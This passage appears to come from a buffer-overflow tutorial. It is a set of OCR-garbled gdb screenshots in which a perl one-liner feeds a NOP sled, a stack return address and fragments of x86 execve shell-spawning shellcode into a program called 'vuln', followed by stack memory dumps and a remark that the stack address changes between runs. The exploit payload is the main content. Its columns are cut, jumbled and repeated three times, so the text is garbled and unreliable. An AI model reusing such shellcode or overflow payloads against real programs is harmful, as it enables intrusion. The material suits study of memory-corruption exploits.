| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11                                  | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/30002<br>od0:<br>od8:<br>od0:<br>od8:<br>of0:<br>of8:<br>c00:<br>c08:<br>c10:<br>c18:<br>c20:<br>c28:<br>c30:<br>c38:<br>c40:<br>c48:                                                                                                    | ived sig<br>ived sig<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x52<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x6                                                                                          | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0  | <ul> <li>'(y or r</li> <li>'(Deskto</li> <li>(x31\xc</li> <li>(2\x69\)</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0x00</li> <li></li></ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xea<br>0x00<br>0xea<br>0x00<br>0xea                                                                                 | ing/vuli<br>xdb\x3:<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0x00<br>0x84<br>0x00<br>0x84<br>0x00<br>0x01<br>0x09<br>0xe0<br>0x58<br>0x91<br>0x00<br>0xa0<br>0xa0                         | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x3c<br>0x3c        | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0xff<br>0xe6<br>0x00<br>0x0e<br>0x0e<br>0x0f | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x08                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11 | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>9090 i<br>/3000:<br>od0:<br>od8:<br>oc0:<br>of8:<br>c00:<br>c08:<br>c10:<br>c18:<br>c20:<br>c28:<br>c30:<br>c28:<br>c30:<br>c28:<br>c38:<br>c40:<br>c48:<br>c50:                                                                                                    | ne beg<br>ome/ka<br>da\xea<br>68\x68<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0xe1<br>0x58<br>0x02<br>0x90<br>0x00<br>0x00<br>0x00<br>0x00<br>0x64<br>0x00<br>0x81<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00 | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0  | <ul> <li>(y or r</li> <li>(Deskto</li> <li>(x31\xc</li> <li>(x69\)</li> <li>(x69\)</li> <li>(x69\)</li> <li>(x60\)</li> <li>(x60\)</li> <li>(x10\)</li> <li>(x00\)</li> <li>(x00\)</li> <li>(x</li></ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb7<br>0x00                                         | ing/vuli<br>xdb\x3<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0x00<br>0x84<br>0x00<br>0x84<br>0x00<br>0x58<br>0x91<br>0x00<br>0xa0<br>0xf4<br>0x00                                          | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x3c<br>0x3c<br>0x3c<br>0x3c<br>0x3c<br>0x3c<br>0x3 | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x0f<br>0x0f<br>0x0f<br>0x66<br>0x00<br>0x0f<br>0x0f<br>0x0f         | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0xb8<br>0x00<br>0x08<br>0x00<br>0x08<br>0x08                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1<br>0xbff1           | from t<br>am: /h<br>\x80\x<br>x73\x<br>n recei<br>9090 i<br>9090 i<br>/3000;<br>od0:<br>od8:<br>od8:<br>od8:<br>of0:<br>of8:<br>c00:<br>c08:<br>c10:<br>c18:<br>c20:<br>c28:<br>c30:<br>c38:<br>c40:<br>c48:<br>c50:<br>c58:                                                                                                    | ived sign<br>(ived sign<br>(ived sign<br>(ived sign<br>(in ?? ())<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x90<br>0x02<br>0x90<br>0x00<br>0x00<br>0x00<br>0x00<br>0x64<br>0x00<br>0x81<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00   | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0              | <ul> <li>'(y or r</li> <li>'() peskto</li> <li>(x31\xc</li> <li>(x69\)</li> <li>(x69\)</li> <li>(x62\)</li> <li>(x69\)</li> <li>(x62)</li> <li>(x62)</li> <!--</td--><td>p/hack<br/>0\x31\;<br/>x6e\x8<br/>Segme<br/>0xbf<br/>0xd2<br/>0x2f<br/>0x89<br/>0xb0<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0x00</td><td>ing/vuli<br/>xdb\x3:<br/>9\xe3\&gt;<br/>entation<br/>0x31<br/>0xb0<br/>0x73<br/>0xe3<br/>0x0b<br/>0x73<br/>0xe3<br/>0x0b<br/>0x90<br/>0x84<br/>0x00<br/>0x84<br/>0x00<br/>0x58<br/>0x91<br/>0x00<br/>0x58<br/>0x91<br/>0x00<br/>0xa0<br/>0xf4<br/>0x00<br/>0x21</td><td>n `perl<br/>1\xc9\x<br/>(51\x53)<br/>fault.<br/>0xc0<br/>0x46<br/>0x68<br/>0x51<br/>0xcd<br/>0xf3<br/>0x1c<br/>0x52<br/>0x00<br/>0x82<br/>0x3c<br/>0x1c<br/>0x3c<br/>0x1c<br/>0x3f<br/>0x3c<br/>0x3f<br/>0x3f<br/>0x83<br/>0x83</td><td>-e 'prin<br/>31\xd2<br/>\$\x89\x<br/>0x31<br/>0xcd<br/>0x68<br/>0x53<br/>0x80<br/>0xf7<br/>0xff<br/>0x0b<br/>0x00<br/>0x04<br/>0x0f<br/>0x0f<br/>0x0f<br/>0x0f<br/>0x0f<br/>0x0f</td><td>0xdb<br/>0xdb<br/>0x80<br/>0x2f<br/>0x89<br/>0x00<br/>0xb7<br/>0xbf<br/>0xb8<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x07<br/>0x08<br/>0x00<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x08<br/>0x00<br/>0x08<br/>0x08<br/>0x00000000</td></ul> | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0x00 | ing/vuli<br>xdb\x3:<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0x00<br>0x84<br>0x00<br>0x58<br>0x91<br>0x00<br>0x58<br>0x91<br>0x00<br>0xa0<br>0xf4<br>0x00<br>0x21 | n `perl<br>1\xc9\x<br>(51\x53)<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3f<br>0x3c<br>0x3f<br>0x3f<br>0x83<br>0x83               | -e 'prin<br>31\xd2<br>\$\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0x0f<br>0x0f<br>0x0f<br>0x0f<br>0x0f        | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x07<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x08<br>0x00<br>0x08<br>0x08<br>0x00000000                                                                                                    |

| 0xbfff1c60:                                                         | 0xa9 | 0x83 | 0x04 | 0x08 | 0x02 | 0x00 | 0x00 | 0x00 |  |
|---------------------------------------------------------------------|------|------|------|------|------|------|------|------|--|
| 0xbfff1c68:                                                         | 0x84 | 0x1c | 0xff | 0xbf | 0x00 | 0x84 | 0x04 | 0x08 |  |
| 0xbfff1c70:                                                         | 0xf0 | 0x83 | 0x04 | 0x08 | 0xd0 | 0x60 | 0x0e | 0xb8 |  |
| 0xbfff1c78:                                                         | 0x7c | 0x1c | 0xff | 0xbf | 0x05 | 0x16 | 0x0f | 0xb8 |  |
| 0xbfff1c80:                                                         | 0x02 | 0x00 | 0x00 | 0x00 | 0xff | 0x35 | 0xff | 0xbf |  |
| Type <return> to continue, or q <return> to quitq</return></return> |      |      |      |      |      |      |      |      |  |
| Quit                                                                |      |      |      |      |      |      |      |      |  |
| (gdb)                                                               |      |      |      |      |      |      |      |      |  |

So as you can see the stack address changes every time we run the program